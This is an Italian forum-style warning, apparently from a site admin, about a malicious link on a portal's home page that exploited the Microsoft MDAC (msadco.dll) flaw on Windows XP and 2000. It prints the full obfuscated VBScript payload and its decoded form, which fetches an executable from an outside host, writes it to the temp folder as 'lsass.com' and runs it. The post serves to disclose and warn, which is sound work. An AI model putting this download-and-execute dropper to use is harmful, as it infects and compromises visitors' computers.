IL PROBLEMA E' IL SEGUENTE:
Purtroppo sulla home del portale abbiamo qualche link non proprio angelico e pulito.
Come al solito diciamo: GRAZIE MICROSOFT!!!
Sono affetti dal problema gli utenti che utilizzano Windows XP SP2/ 2000
Il seguente exploit è dovuto ad un componente di windows dedicato alla gestione remota delle connessioni DB
"Microsoft Data Access Components" msadco.dll
Bollettino Microsoft:
http://www.microsoft.com/italy/technet/ ... 6-014.mspx
Infatti il browser tenta di scaricare dalla seguente fonte :
__http://usuarios.arnet.com.ar/alvarezluque/morgan.html__
al suddetto link il nostro pc tenta di eseguire questo codice:
**************************************
<SCRIPT LANGUAGE="VBS"><!--
d="=tdsjqu mbohvbhf>WCTdsjqu?po fssps sftvnf ofyuem > iuuq;00vtvbsjpt/bsofu/dpn/bs0bmwbsf{mvrvf0gmbti8/fyfTfu eg > epdvnfou/dsfbufFmf1#(pckfdu*eg/tfuBuusjcvuf dmbttje-.#tje;CE:7D667.76B4.22E1.:94B.11D15GD3:F47=$y<$g/D6$P-$(Njdsptpgu/YNMIUUQ-C$tfu TT#g$^$(Bepec/TusfbnO#T/uzqf > 2tus7>HFUy/Pqfo 6#- em- Gbmtf;#Tfoe' Hfu ufnq ejsfdupsz boe ;$ pvs eftujobujpo obnfg*#2>mtbtt)'w$Gw$,(joh/GjmfTztufnj%W%unq > G/HfuTqfdjbmGpmefs(3* m$nq g7#I$ G/CvjmeQbui(unq-;#$&pqfo+#xsjuf y/sftqpotfCpez;#tbwfupgjmf Y#-3:#dmp4&\$R<%ifmm/Bqqmjd'&3%R/=#Fyfd,)v#A#-U$-1=0t|%?=0cpez?=0iunm?=9# (#-#7#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8#8# =0tdsjqu"
s=""
For i=1 To Len(d)
b=Mid(d,i,1)
a=Asc(b)
If a=1 Then a=9
If a=2 Then a=10
If a=3 Then a=13
If a=4 Then a=34
If a<=31 And a>=14 Then
s=s+Mid(s,Len(s)-(Asc(Mid(d,i+1,1))-36+90*(Asc(Mid(d,i+2,1))-35)),a-14+4)
i=i+2
Else
if a>=41 and a<=127 then a=a-1
if a <127 then s=s+Chr(a) else s=s+b
End If
Next
document.write s
-->
**************************************
Che tradotto in codice VBScript è:
**************************************
<script language="VBScript">
on error resume next
dl = "http://usuarios.arnet.com.ar/alvarezluque/flash7.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
Set x = df.CreateObject("Microsoft.XMLHTTP","")
set S = df.createobject("Adodb.Stream","")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
' Get temp directory and create our destination name
fname1="lsass.com"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2) ' Get tmp folder
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script></body></html><script>
**************************************
In breve,
il pc tenta di scaricare ed eseguire un file exe malevolo identificato dal mio antivirus come: VBS/Psyme
(
http://us.mcafee.com/virusInfo/default. ... s_k=100749)
Se non eravate protetti da un antivirus aggiornato siete stati sicuramente infettati a meno che non abbiate effettuato gli aggiornamenti della sicurezza di Windows:
Il file infetto che sta, probabilmente, facendo bagordi sul vostro pc si sarà sicuramente riprodotto in molte cartelle ma potreste cmqe isolarne una copia dalla cartella dei file temporanei internet : il nome del file dovrebbe essere "lsass.com"
Fate una breve ricerca su internet per risolvere il problema e disinfettarvi.
Chi era protetto può star tranquillo.
Ciao a presto
Leomenca.